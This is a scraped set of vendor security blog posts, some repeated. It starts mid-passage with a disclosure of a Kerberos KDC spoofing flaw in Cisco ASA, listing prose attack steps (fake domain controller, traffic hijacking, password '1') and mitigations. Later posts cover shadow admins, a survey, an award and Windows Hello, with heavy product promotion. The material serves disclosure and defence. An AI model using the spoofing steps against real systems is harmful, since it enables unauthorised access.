KDC does not authenticate to the server, the security of the protocol is entirely compromised, allowing an attacker that hijacked the network traffic to authenticate to Cisco ASA with any password, even a wrong one. Background An overview of the Kerberos Protocol The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments. The protocol consists of three exchanges to provide mutual authentication for the user and the server accessed. When users log in, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) Exchange. The ticket is then used during the Client/Server Exchange to complete the authentication: 1. Authentication Service (AS) Exchange During the AS exchange the user authenticates with the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate with services in the network without re-entering the credentials. When the user first enters the credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ is a message signed by the Master Key, which is a function of the user’s password. The Authentication Service, which is part of the KDC, verifies the AS_REQ according the master key, which is also available to the KDC. After validation the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket-Granting Ticket (TGT), that is encrypted with the KDC’s key. The AS Exchange is outlined below. The TGT will be used by the TGS exchange to obtain access to specific services. 2. Ticket-Granting Service (TGS) Exchange When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Server (TGS) function of the KDC. This message is encrypted with the logon session key, which is obtained during the AS Exchange. The TGS_REQ is verified by the TGS, which then returns a TGS_REP. The TGS_REP contains a service session key and a service ticket, which is encrypted with the master key of the server that hosts the service. The master key of the server in a Unix-based system is configured in a file called a keytab file. The master key of the server in a member server is derived from the computer account’s password. The TGS Exchange is outlined below. 3. Client/Server Exchange Now the client has everything it needs to authenticate to the service. The client sends an AP_REQ to the service, which is encrypted with the service session key. The service decrypts the service session key to validate the AP_REQ. Then the server returns an AP_REP message and the authentication is complete. The client-server exchange is outlined below: Spoof-Proof Protocol When the Kerberos protocol is implemented correctly, an attacker attempting to impersonate the KDC cannot bypass the authentication. That is because even if an attacker successfully creates a valid AS_REP in response to a hijacked AS_REQ, the attacker will never be able to engineer a valid service ticket. Since the service ticket is encrypted with the server key, a key that the attacker does not have, that would be impossible. What is KDC Spoofing? In 2000, Dug Song reported a vulnerability that affects the Kerberos protocol Song, Dug. 2000. Kerberos KDC Spoofing Vulnerability. 28 August. . He discovered that certain implementations and configurations of Kerberos clients fail to execute the Client/Server exchange, and allow the authentication based on the success of the previous exchanges. Unfortunately, this behavior is not secure, and can be exploited by an attacker. An attacker that is able to hijack the communication between the client and the DC, can take the following steps: Create a fake KDC. Obtain a username authorized to access the service you want to attack. Create a user in the fake KDC with a password of the attacker’s choice. For the demonstration, let’s call this password ”1”. Authenticate to the service with the obtained username and the password ”1”. Hijack the communication from the client to the DC and divert it to the fake KDC. During the AS Exchange, return an AS_REP that corresponds to the password ”1”, the fake KDC key, and a fake logon session key. During the TGS Exchange, return any TGS_REP. The client will accept the authentication without performing an application exchange. The KDC spoofing attacks assume the attacker is able to hijack traffic to and from at the KDC and answer on the KDC’s behalf. This can be done using a variety of techniques. For example, if the attacker is within the same physical network segment as the client, it can perform an ARP spoofing attack as outlined in Network Security Hacks Lockhart 2007. Another possible approach is to take over a networking device such as a switch or router and control the communication from there. How We Discovered the Vulnerability in Cisco ASA We were looking for a way to add Multi Factor Authentication (MFA) to administrators accessing Cisco ASA and Anyconnect VPN. After configuring Cisco to use Kerberos as the authentication protocol, we examined the authentication logs in Silverfort’s console. Silverfort provides full visibility into all the authentication activities in the network. Silverfort’s logs showed that Cisco ASA was requesting a TGT without requesting a service ticket. We went back to the configuration guide Cisco. 2007. PIX/ASA : Kerberos Authentication and LDAP Authorization Server Groups for VPN Client Users via ASDM/CLI Configuration Example. 30 July. ; and looked at the parameters required to configure Kerberos authentication: As seen above, there is no place to enter the password or keytab configuration for Kerberos authentication. The password or keytab are required for a correct implementation since they create the ‘secret’ used by Kerberos to authenticate in a trusted way to the KDC. Without the ‘secret’, authentication cannot be cryptographically trusted. We went ahead and tried the same for other Cisco interfaces and saw the same vulnerability exists when opening firewall sessions, administrative authentication and even when using SSH to access the VM. See below the Kerberos column in the table summarizing Cisco support for different authentication protocols. Exploitation Next, we wanted to see is this vulnerability can be exploited. For that, we hijacked the Kerberos traffic intended for the DC and diverted it to our server. Instead of developing our own KDC logic, we simply installed AD Domain Services on our rogue server, promoting our server to be a domain controller. Of course, not being an admin in the original domain, we created a new fake domain. Since we know the username for the Cisco administrator in the first domain (Bob in this example), we created a user named Bob in our fake domain. We configured that user’s password in our fake domain to be “1”. We then tried the following situations: Regular login (Traffic not diverted) – we managed to login with Bob’s original password, as expected. When trying the password “1”, the login failed. Logging in with the traffic diverted to our fake DC – logging in with Bob’s original password failed but logging in with the password “1” worked. Prevention and Mitigation Mitigation Steps for Security Professionals First of all, upgrade your Cisco ASA to a fixed version and make the required configuration changes detailed in the Cisco advisory Continuously monitor your Kerberos authentication. Look for resources that request only AS_REQ. If there are no TGS_REQs, it’s a red flag. Use Silverfort’s Silverfort’s open source tool to search the authentication logs for services that don’t request service tickets. See developer recommendations for any internally developed applications that implement Kerberos and systems you configured by yourself. Silverfort customers are leveraging the step-up authentication capability with Palo Alto Networks should update their Silverfort MFA policy from a TGT policy to a service ticket policy after upgrading their PAN-OS. As a Developer We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing: Validate that the implementation of Kerberos requires a password or keytab: To validate the DC, you need to use some kind of shared secret. If your solution does not enable configuring a keytab file, or a service account password, the application is surely susceptible to KDC spoofing. Run Wireshark – use Wireshark to see what Kerberos requests are sent during authentication. If there is no TGS_REQ, it’s a red flag. If you want to implement an authentication protocol yourself, you must follow the protocol RFCs diligently. We recommend taking the easier route and using an existing implementation of these protocols. Use 3rd party libraries properly – some 3rd party libraries require specific configuration to avoid KDC spoofing. For example, a common library used for Kerberos called pam-krb5, has to have a keytab configured to work properly. Here is the relevant paragraph from their documentation (https://github. com/rra/pam-krb5/blob/master/README. md) --- - Published: 2020-02-18 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/post-test/ Executive Summary This survey discloses a critical gap in organizations’ ability to protect themselves against identity threats—with 83% already having experienced a breach involving compromised credentials. Account takeover, lateral movement, and ransomware spread are a prominent cyber risk. To gain resiliency against these attacks, organizations strive to have the ability to prevent—in real time—malicious access with compromised credentials to their resources. The common practice today is to lean on solutions such as MFA and PAM, as well as manual monitoring of service accounts, to get this protection. However, surveys of identity security teams reveal that in most cases, these solutions fail to deliver the required level of protection. This failure manifests in the vast majority of organizations experiencing an identity-related data breach, as well as a shared notion among identity teams that they don’t have the ability to thwart such attacks in the future. Key Takeaways The key takeaways from this research are: Over 80% of organizations have experienced an identity-related breach that involved the use of compromised credentialsAlmost half of organizations experienced such a breach in the past 12 months. 65. 4% of organizations have not implemented MFA comprehensively enough to provide sound protectionOrganizations are not protecting their entire workforce with MFA, and only one in eight have more than 70% of their resources and access methods covered. Only 5. 7% of organizations have full visibility into their service accountsVery few organizations have full visibility into the activity and usage of their service accounts, while 62% only have partial visibility. Protection of service accounts introduces a huge challenge to organizations with only 22% able to prevent adversaries from using them for malicious access78% of organizations cannot prevent the misuse of service accounts in real time, since security is sporadic or missing. 73. 4% of organizations struggle with getting their PAM solutions fully onboarded and workingMany organizations have encountered difficulties in their PAM implementation, causing progress to halt. Most know what to do but are too resource-constrained to move ahead. Only one in five organizations are highly confident that they could prevent identity threatsVery few organizations are confident they can stop initial access or lateral movement due to the malicious use of compromised credentials. Figure 1Identity Infrastructure Distribution: On-Premises, Hybrid and Cloud OnlyPercentage of respondents Figure 1Identity Infrastructure Distribution: On-Premises, Hybrid and Cloud OnlyPercentage of respondents Figure 1Identity Infrastructure Distribution: On-Premises, Hybrid and Cloud OnlyPercentage of respondents Confidence to prevent attackers from using compromised privileged user accounts for malicious access One ultimate test of the efficacy of a PAM solution is high confidence to prevent misuse of privileged user credentials. We asked respondents to indicate their level of confidence. Per Figure 6, 34. 3% of respondents indicate their organization is at the high confidence level—which means all privileged accounts have been identified and secured. --- - Published: 2020-01-27 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/the-hidden-dangers-of-shadow-admins/ Shadow Admin accounts are user accounts that have sensitive privileges – not because they are members of a privileged admin Active Directory (AD) group, but because they were inadvertently assigned permissions that can allow them to take over other privileged accounts and leverage them to reach their target systems to compromise them. If a Shadow Admin account is compromised, it can be very risky for the organization. After all, these user accounts can be used to compromise additional accounts and gain administrative privileges. Yet identifying these accounts and restricting their access is not a trivial task. What are Shadow Admins? A Shadow Admin is a user who is not a member of AD administrative groups like Domain Admins, Enterprise Admins, Schema Admins, Administrators, etc. Yet this user will have rights to some sort of administrative capabilities on an admin account, that enable this user to gain further administrative capabilities. These administrative capabilities include: Full Control Rights (user or group) Write All Properties (on a group) Reset Password (on a user) All Extended Rights (on a user) Change Permissions (user or group) Write Member (on a group) Write Owner (user or group) The Actual Owner (user or group) Additionally, any user who can take over and control a Shadow Admin of any level, would also be considered a shadow admin. An Example of a Shadow Admin: Let’s say Bob is a Domain Admin (a member of the Domain Administrators group). This means that Bob has domain admin access to Active Directory. Figure 1: Bob is a member of the Domain Administrators Group Alice is not a member of the Domain Administrators Group. However, Alice has the ability to reset Bob’s password. Therefore, Alice can reset Bob’s password, login as Bob and execute tasks that require Domain Admin privileges on his behalf. This makes Alice a “Shadow Admin”. Figure 2: Alice can reset Bob’s password which makes her a “Shadow Admin” Now, let’s say Larry can reset Alice’s password. This means that Larry can reset Alice’s password, login as Alice, change Bob’s password, then login as Bob and execute tasks that require Domain Admin privileges. This makes Larry a level 2 shadow admin. Figure 3: Larry can reset Alice’s password, which makes him a “Shadow Admin” as well And It doesn’t end with Larry. Who can reset Larry’s password? The process continues and an organization could, potentially, have many shadow admins. 3 Reasons Why Shadow Admins Are Created There are a few reasons why shadow admins exist in our networks: Human Error or Mismanagement of User Rights: Shadow Admins can be created by inexperienced administrators by mistake or because they did not fully understand the implications of direct privilege assignments. Although there are no malicious intents behind such shadow admin accounts, they can still present risk to the environment by allowing users unauthorized access to sensitive assets. Created for Temporary Use but Never Removed: Although this is considered a bad practice, in some cases IT administrators may grant accounts temporary privileges that turn the users into shadow admins, with the intention to remove these privileges at a later date. While this can solve immediate problems, these privileges are often left in place, leaving these accounts with unsupervised administrative privileges. Adversaries May Create Shadow Admins for Hiding Activities and Remaining Stealthy: Once admin privileges have been achieved, attackers can create a shadow admin accounts to allow persistence and to conceal their activities. These shadow admin accounts can then be used to hide malicious activities while that attacker remains stealthy. Regardless of the reason behind their creation, shadow admins pose risk to the organization as they allow unauthorized individuals to perform activities that they shouldn’t perform. If an adversary gains control over a shadow admin account, it can be used as an attack vector. The fact that these accounts are not monitored or supervised means that not only you don’t know you should restrict their access (you can’t fix problems you don’t know about), but it also means that unauthorized access and changes may go undetected. In some cases, such unauthorized access or changes may be detected too late – after sensitive data was leaked or after critical systems were compromised. How Can I Determine Who My Shadow Admins Are? Identifying shadow admins is a challenging and complex problem. You first have to determine who your administrators are, i. e. all the users who belong the AD Groups that provide them administrative privileges. Some AD groups are obvious, like the Domain Admin group. But some groups are less obvious. We’ve seen that in many organizations, different administrative groups are created to support different business purposes. In some cases, you can even find nested groups. It’s important to map out all the members of these groups. As we map out the group memberships, we have to take into consideration not only the user identities that show up in the member list, but also any user’s Primary Group ID configurations. Understanding the members of our administrative groups in AD is an important first step, but it’s not enough for identifying all privileged accounts in the domain. This is because they do not include the shadow admins. To detect the shadow admins, you need to analyze the ACL permissions granted to each account. Think You Can Analyze the ACLs? Think Again As explained previously, to detect shadow admins you need to analyze the ACL permission of each account in AD, to understand if the account has privileges over any administrative groups or individual admin accounts. This, in itself, is a very difficult, if not impossible, task for any human being. If you are able to perform this analysis, it will provide you the first level of shadow admins. But it’s not enough. You now need to analyze all the ACLs again to understand who has privileges to change these first level shadow admins. And then again, and again, and again – this process needs to continue until all the levels of your shadow admins are detected. And what if you found a shadow admin group? That complicates things even more. The bottom line is that this important analysis can’t be done manually. Silverfort: The Best MFA Solution Silverfort periodically queries Active Directory to get the different ACLs of all the objects in the domain. It automatically identifies common admin groups. It then analyzes the ACLs in search of shadow admin users and groups that have equivalent privileges to the members of these admin groups – privileges that effectively make them shadow admin accounts/groups. It continues to analyze the ACLs to determine as many times as needed to identify all levels of shadow admin accounts and groups making sure you have full visibility into those potentially dangerous accounts. This comprehensive list should then be reviewed by AD administrators to determine if the privileges or these shadow admin accounts and groups are legitimate or not, and if they should be restricted or supervised. In addition, Silverfort continuously monitors and analyzes all the access requests across the domain. It considers shadow admins as high-risk accounts. Silverfort automatically identifies, in real-time, sensitive activities, like an attempt to reset a user password, and either alert on it, or require the user the validate his/her identity with multi-factor authentication (MFA) before allowing the password reset. This can prevent unauthorized changes to user accounts as well as any unauthorized access to sensitive assets in the network. If you would like to learn more about this – contact us to schedule a demo --- - Published: 2020-01-27 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/the-hidden-dangers-of-shadow-admins-2/ Shadow Admin accounts are user accounts that have sensitive privileges – not because they are members of a privileged admin Active Directory (AD) group, but because they were inadvertently assigned permissions that can allow them to take over other privileged accounts and leverage them to reach their target systems to compromise them. If a Shadow Admin account is compromised, it can be very risky for the organization. After all, these user accounts can be used to compromise additional accounts and gain administrative privileges. Yet identifying these accounts and restricting their access is not a trivial task. What are Shadow Admins? A Shadow Admin is a user who is not a member of AD administrative groups like Domain Admins, Enterprise Admins, Schema Admins, Administrators, etc. Yet this user will have rights to some sort of administrative capabilities on an admin account, that enable this user to gain further administrative capabilities. These administrative capabilities include: Full Control Rights (user or group) Write All Properties (on a group) Reset Password (on a user) All Extended Rights (on a user) Change Permissions (user or group) Write Member (on a group) Write Owner (user or group) The Actual Owner (user or group) Additionally, any user who can take over and control a Shadow Admin of any level, would also be considered a shadow admin. An Example of a Shadow Admin: Let’s say Bob is a Domain Admin (a member of the Domain Administrators group). This means that Bob has domain admin access to Active Directory. Figure 1: Bob is a member of the Domain Administrators Group Alice is not a member of the Domain Administrators Group. However, Alice has the ability to reset Bob’s password. Therefore, Alice can reset Bob’s password, login as Bob and execute tasks that require Domain Admin privileges on his behalf. This makes Alice a “Shadow Admin”. Figure 2: Alice can reset Bob’s password which makes her a “Shadow Admin” Now, let’s say Larry can reset Alice’s password. This means that Larry can reset Alice’s password, login as Alice, change Bob’s password, then login as Bob and execute tasks that require Domain Admin privileges. This makes Larry a level 2 shadow admin. Figure 3: Larry can reset Alice’s password, which makes him a “Shadow Admin” as well And It doesn’t end with Larry. Who can reset Larry’s password? The process continues and an organization could, potentially, have many shadow admins. 3 Reasons Why Shadow Admins Are Created There are a few reasons why shadow admins exist in our networks: Human Error or Mismanagement of User Rights: Shadow Admins can be created by inexperienced administrators by mistake or because they did not fully understand the implications of direct privilege assignments. Although there are no malicious intents behind such shadow admin accounts, they can still present risk to the environment by allowing users unauthorized access to sensitive assets. Created for Temporary Use but Never Removed: Although this is considered a bad practice, in some cases IT administrators may grant accounts temporary privileges that turn the users into shadow admins, with the intention to remove these privileges at a later date. While this can solve immediate problems, these privileges are often left in place, leaving these accounts with unsupervised administrative privileges. Adversaries May Create Shadow Admins for Hiding Activities and Remaining Stealthy: Once admin privileges have been achieved, attackers can create a shadow admin accounts to allow persistence and to conceal their activities. These shadow admin accounts can then be used to hide malicious activities while that attacker remains stealthy. Regardless of the reason behind their creation, shadow admins pose risk to the organization as they allow unauthorized individuals to perform activities that they shouldn’t perform. If an adversary gains control over a shadow admin account, it can be used as an attack vector. The fact that these accounts are not monitored or supervised means that not only you don’t know you should restrict their access (you can’t fix problems you don’t know about), but it also means that unauthorized access and changes may go undetected. In some cases, such unauthorized access or changes may be detected too late – after sensitive data was leaked or after critical systems were compromised. How Can I Determine Who My Shadow Admins Are? Identifying shadow admins is a challenging and complex problem. You first have to determine who your administrators are, i. e. all the users who belong the AD Groups that provide them administrative privileges. Some AD groups are obvious, like the Domain Admin group. But some groups are less obvious. We’ve seen that in many organizations, different administrative groups are created to support different business purposes. In some cases, you can even find nested groups. It’s important to map out all the members of these groups. As we map out the group memberships, we have to take into consideration not only the user identities that show up in the member list, but also any user’s Primary Group ID configurations. Understanding the members of our administrative groups in AD is an important first step, but it’s not enough for identifying all privileged accounts in the domain. This is because they do not include the shadow admins. To detect the shadow admins, you need to analyze the ACL permissions granted to each account. Think You Can Analyze the ACLs? Think Again As explained previously, to detect shadow admins you need to analyze the ACL permission of each account in AD, to understand if the account has privileges over any administrative groups or individual admin accounts. This, in itself, is a very difficult, if not impossible, task for any human being. If you are able to perform this analysis, it will provide you the first level of shadow admins. But it’s not enough. You now need to analyze all the ACLs again to understand who has privileges to change these first level shadow admins. And then again, and again, and again – this process needs to continue until all the levels of your shadow admins are detected. And what if you found a shadow admin group? That complicates things even more. The bottom line is that this important analysis can’t be done manually. Silverfort: The Best MFA Solution Silverfort periodically queries Active Directory to get the different ACLs of all the objects in the domain. It automatically identifies common admin groups. It then analyzes the ACLs in search of shadow admin users and groups that have equivalent privileges to the members of these admin groups – privileges that effectively make them shadow admin accounts/groups. It continues to analyze the ACLs to determine as many times as needed to identify all levels of shadow admin accounts and groups making sure you have full visibility into those potentially dangerous accounts. This comprehensive list should then be reviewed by AD administrators to determine if the privileges or these shadow admin accounts and groups are legitimate or not, and if they should be restricted or supervised. In addition, Silverfort continuously monitors and analyzes all the access requests across the domain. It considers shadow admins as high-risk accounts. Silverfort automatically identifies, in real-time, sensitive activities, like an attempt to reset a user password, and either alert on it, or require the user the validate his/her identity with multi-factor authentication (MFA) before allowing the password reset. This can prevent unauthorized changes to user accounts as well as any unauthorized access to sensitive assets in the network. If you would like to learn more about this – contact us to schedule a demo --- - Published: 2020-01-23 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/silverfort-named-winner-of-the-pci-2020-awards-for-excellence/ Silverfort has been named a winner of the PCI 2020 Awards for Excellence at this year’s prestigious PCI London event. The AKJ Associates’ fourth annual PCI Awards for Excellence recognize and honor the industry’s most outstanding examples of best practice in payment security and PCI DSS projects and implementations. The award was presented to Silverfort at the PCI London 2020 event in recognition of its agentless authentication platform, which enables customers to meet PCI DSS requirements for enforcing Multi-Factor Authentication to secure privileged access to the CDE (Cardholder Data Environment) – without requiring code changes or software agents on CDE systems, and without deploying proxies in the network. Silverfort introduced a real-life PCI DSS project, successfully implemented for BlueSnap – a global payment company headquartered in the USA, with offices in the UK and Israel. The company provides an All-in-One Payment Platform designed to increase sales and reduce costs for B2B and B2C businesses. BlueSnap’s production systems run on a variety of IT platforms that are not supported by mainstream MFA solutions. Silverfort’s agentless authentication platform enabled them to incorporate MFA to secure all interfaces and access to the CDE, without requiring any custom implementations that would otherwise require tailored solutions for each system. Read the full case study “We are especially honored to accept the PCI 2020 Award for Excellence since it is based on reviews of real-life projects and case studies,” said Hed Kovetz, Co-Founder and CEO of Silverfort. “Silverfort successfully demonstrated that its holistic authentication platform enables organizations to add MFA to any system — including systems that were considered unprotectable until today — without deploying any software agents, implementing proxies or requiring any configuration changes. This enables our customers to easily protect all their CDE systems and address PCI DSS requirements. ” Silverfort’s patent-pending technology, enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more – without code changes, software agents or proxies. It allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. To learn how we can help your organization please schedule a demo --- - Published: 2020-01-23 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/silverfort-named-winner-of-the-pci-2020-awards-for-excellence-2/ Silverfort has been named a winner of the PCI 2020 Awards for Excellence at this year’s prestigious PCI London event. The AKJ Associates’ fourth annual PCI Awards for Excellence recognize and honor the industry’s most outstanding examples of best practice in payment security and PCI DSS projects and implementations. The award was presented to Silverfort at the PCI London 2020 event in recognition of its agentless authentication platform, which enables customers to meet PCI DSS requirements for enforcing Multi-Factor Authentication to secure privileged access to the CDE (Cardholder Data Environment) – without requiring code changes or software agents on CDE systems, and without deploying proxies in the network. Silverfort introduced a real-life PCI DSS project, successfully implemented for BlueSnap – a global payment company headquartered in the USA, with offices in the UK and Israel. The company provides an All-in-One Payment Platform designed to increase sales and reduce costs for B2B and B2C businesses. BlueSnap’s production systems run on a variety of IT platforms that are not supported by mainstream MFA solutions. Silverfort’s agentless authentication platform enabled them to incorporate MFA to secure all interfaces and access to the CDE, without requiring any custom implementations that would otherwise require tailored solutions for each system. Read the full case study “We are especially honored to accept the PCI 2020 Award for Excellence since it is based on reviews of real-life projects and case studies,” said Hed Kovetz, Co-Founder and CEO of Silverfort. “Silverfort successfully demonstrated that its holistic authentication platform enables organizations to add MFA to any system — including systems that were considered unprotectable until today — without deploying any software agents, implementing proxies or requiring any configuration changes. This enables our customers to easily protect all their CDE systems and address PCI DSS requirements. ” Silverfort’s patent-pending technology, enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more – without code changes, software agents or proxies. It allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. To learn how we can help your organization please schedule a demo --- - Published: 2020-01-07 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/reducing-the-password-footprint-in-a-windows-environment/ *****By Yaron Kassner, CTO and Co Founder, Silverfort***** The word password-less gets thrown around a lot lately, and while everybody is talking about it, I haven’t met any enterprises that actually managed to eliminate passwords. Eliminating passwords is a big challenge, and I believe big challenges should be solved in small steps. So in this blog post, I will suggest a series of recommended steps that would help enterprises eliminate passwords. Frankly, this isn’t something I would recommend to every enterprise – it’s a lot to take on. But the first steps should be practical for everybody, and should already be enough to relieve most of the pain inflicted by passwords while strengthening the organisation’s security. Can We Just Get Rid of Passwords? Let’s start with a thought experiment: what would happen if you got rid of password complexity requirements in the enterprise or if you removed the requirement to change passwords often? These changes are likely to have an immediate positive impact on the happiness levels of your employees. However, right after that, you would get hacked. That’s because both user endpoints and enterprise systems will become an easy target for hackers. So before you even begin thinking of getting rid of passwords, you need to ensure secure access to all endpoints and enterprise systems with something better than a password. Fortunately, combining Windows Hello for Business and Silverfort, you can achieve this. I will start with an overview of WHFB and how it should be used, and continue with explaining why it’s important to add Silverfort and how Silverfort can ensure secure access to everything on top of the endpoint. What is Windows Hello for Business (WHFB)? In an effort to go password-less, Microsoft introduced the ‘Windows Hello’ feature with the release of Windows 10. WHFB is a variant of this feature that is designed for corporates. The feature allows a secure way to access your device, Active Directory (AD) and Entra ID (formerly Azure AD) by leveraging the following capabilities: Device Unlock WHFB places great significance on your device, as it holds the keys to AD and Entra ID (formerly Azure AD). Therefore, it’s important to prevent malicious actors from unlocking the device and getting to those keys. However, I’m baffled by the choice to replace the passwords with pin-codes. Is that really enough to claim the login is now password-less? because a pin-code is not a password? Is that enough to protect the device? Thankfully, Microsoft offers additional factors for unlocking your device, which – if combined with the pin-code – should provide better-than-password-only-security for unlocking the device. Authentication to Active Directory (AD) Once you unlock your computer, you unlock a private key that’s saved on your TPM, and that private key can be used for Kerberos authentication with AD. If your endpoint policies allow storing cached credentials on the computer, when you logon – the computer will unlock without authenticating to Active Directory. Otherwise, if credentials aren’t cached, your computer will have to request a Kerberos TGT, and a host ticket before it unlocks. Forcing authentication to AD will be more secure than just relying on cached credentials. Authentication to Entra ID (formerly Azure AD) Authentication to Entra ID (formerly Azure AD) is similar, and also relies on the private key saved on the device. It’s better to require authentication to Entra ID (formerly Azure AD) before unlocking the device. Below is a figure that depicts the authentication flow with WHFB in a hybrid configuration. Is Multi-Factor Unlock the Same As Multi-Factor Authentication (MFA)? According to the way FIPS defines MFA, a physical token that requires something you know or are to unlock is considered MFA, because one factor is the physical token (something you have), and the other factor is the gesture you provide. According to this definition, the computer can be considered a physical token and WHFB can be formally considered MFA even if multi-factor unlock is disabled. The distinction is that if the resource that you want to protect is the device itself, you need multi-factor unlock to have MFA to it. If the resource that you want to protect is external to the device, WHFB without multi-factor unlock suffices. Of course, these are all formalities, and if you want best security you should always require multi-factor unlock. Which deployment and trust model should I choose? Microsoft has several deployment types to choose from. Hybrid Entra ID (formerly Azure AD) Joined Key Trust Deployment Hybrid Entra ID (formerly Azure AD) Joined Certificate Trust Deployment Entra ID (formerly Azure AD)Entra ID (formerly Azure AD) Join Single Sign-on Deployment Guides On Premises Key Trust Deployment On Premises Certificate Trust Deployment I don’t think many organizations can seriously consider the last 3 because most organizations aren’t ready to get rid of their AD, and are probably moving to the cloud (or will be soon). This leaves us with the Hybrid Azure AD Joined options. I recommend going with the Certificate Trust Deployment, because in addition to local logins it also enables security for remote desktop. What happens when users are offline? When I first tried WHFB, I was worried about not being able to login when my computer is offline. Microsoft’s diagrams show the authentication to Entra ID (formerly Azure AD) as a preliminary authentication flow for unlocking the device. In reality, this usually happens before the computer unlocks, but it’s not a necessary step to unlock your computer. So users will be able to unlock their computers even when they’re offline. This also means that we can’t rely on Entra ID (formerly Azure AD) for preventing unauthorized access to user devices. Improving the Security of WHFB There are four scenarios where WHFB leverages MFA: Multi-factor unlock Initial authentication to AD Initial authentication to Entra ID (formerly Azure AD) Device registration However, there’s one big unsolved issue – MFA is not required for accessing sensitive resources inside the network, after the initial login. This means that once the user is logged in, if the device has malware on it, the malware can steal the credentials (or a hash) and then it’s free to propagate throughout the network. To make things worse, Single-Sign-On (SSO) opens the door for the attacker to access all of the resources without any additional verification. What Doesn’t WHFB Cover? WHFB covers Entra ID (formerly Azure AD) and AD when the client is an updated Windows 10 device. But in many enterprise scenarios, this is not the case. Just to give a few examples: LDAP applications Applications that initiate Kerberos authentication as the client (not SSO) Macbooks Windows 7 Windows servers Linux We all have these in our environments, so you need to figure out how to protect them from unauthorized access. How Can Silverfort Help? Protecting Resources Within the Network Silverfort can enforce MFA and risk-based authentication to ensure secure access to sensitive resources within the corporate network and cloud environment. It’s important to note that Silverfort secures access to resources after the user device has been unlocked. You can use a solution like Silverfort to add Risk-Based Authentication to any of the systems that WHFB doesn’t cover. Then if you want to reduce the footprint of passwords, you can start by simplifying the password policy in the organization. If you’re adding MFA to all authentication scenarios with a password, the password doesn’t have to be as complex (you can even use a 6 digit pin-code), and it doesn’t have to be changed that often. This step already significantly reduces the cost of passwords management to the organization. The other part is gaining visibility to the access requests to applications – Silverfort helps you identify all access requests and gradually replace their authentication with a password-less authentication mechanism. Mobile MFA for the endpoint If you want to implement stronger security before unlocking user workstations, you can use Silverfort’s MFA solution as an additional authentication factor. Silverfort can work with out-of-band authentication, which can provide additional security over the factor Microsoft supports. In addition, Silverfort can add out-of-band authentication to devices that don’t support WHFB, such as Windows 7 devices. MFA for Remote Desktop Silverfort provides MFA for remote desktop, even if you chose to go with the Hybrid Entra ID (formerly Azure AD) Joined Key Trust Deployment. MFA for device registration The first step of registering a device to Entra ID (formerly Azure AD), typically requires MFA, and that can be achieved with Silverfort. How to Go Password-less Microsoft recommends the following steps for going password-less: 1. Develop a password replacement offering We all know that one factor is not enough. Therefore, removing the password poses a challenge for security, because now you need two factors other than a password. WHFB solves part of this challenge, but as mentioned earlier, it leaves other scenarios unprotected. Your password replacement has to include an alternative authentication factor that can protect all of your resources. 2. Reduce user-visible password surface area The first step here is enabling WHFB. Then, you probably want to use a solution like Silverfort to automatically map all the resources that still use passwords. 3. Transition into a password-less deployment That’s where it gets tricky. The applications that don’t support password-less authentication are going to make it difficult to achieve this step. As mentioned before, I recommend an intermediate step before that, which is enforcing MFA for these applications and at the same time reducing passwords’ length and complexity. 4. Eliminate passwords from the identity directory If your entire environment is covered by SSO, and login to all endpoints is based on Windows Hello for Business, you don’t need a password in your directory at all. However, I think most organizations have a long way to go before that would be possible. An Extended Password-less Strategy The strategy I recommend has a couple of more steps than Microsoft’s, but I think it’s a bit more practical, and it allows you to gain value very early in the process: Image: Recommended process for implementing a ‘passwordless’ strategy Most organizations will implement the top part of the process to improve the security of the organization. It will simplify the login process for most users accessing most applications allowing them to use a simple, easy to remember password. However organizations that want to eliminate passwords completely, will need to go through the additional steps. Final words: Whether you chose to implement a full passwordless strategy or not, I think the combination of Windows Hello for Business and a wide multi-factor authentication solution can significantly improve the user experience and the overall security posture of the organization. Enabling WHFB and Multi-Factor Unlock isn’t difficult. Implementing an MFA solution to secure access to your most sensitive assets – can be more challenging, depending on the solution you use. If you want to know how Silverfort can help you simplify the deployment as well as enable secure authentication for any sensitive system – without requiring software agents or in-line proxies – let us know. We’d be happy to help. Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. Wishing you all Happy Holidays and a Wonderful and Safe 2020! Yaron Kassner --- - Published: 2020-01-07 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/reducing-the-password-footprint-in-a-windows-environment-2/ *****By Yaron Kassner, CTO and Co Founder, Silverfort***** The word password-less gets thrown around a lot lately, and while everybody is talking about it, I haven’t met any enterprises that actually managed to eliminate passwords. Eliminating passwords is a big challenge, and I believe big challenges should be solved in small steps. So in this blog post, I will suggest a series of recommended steps that would help enterprises eliminate passwords. Frankly, this isn’t something I would recommend to every enterprise – it’s a lot to take on. But the first steps should be practical for everybody, and should already be enough to relieve most of the pain inflicted by passwords while strengthening the organisation’s security. Can We Just Get Rid of Passwords? 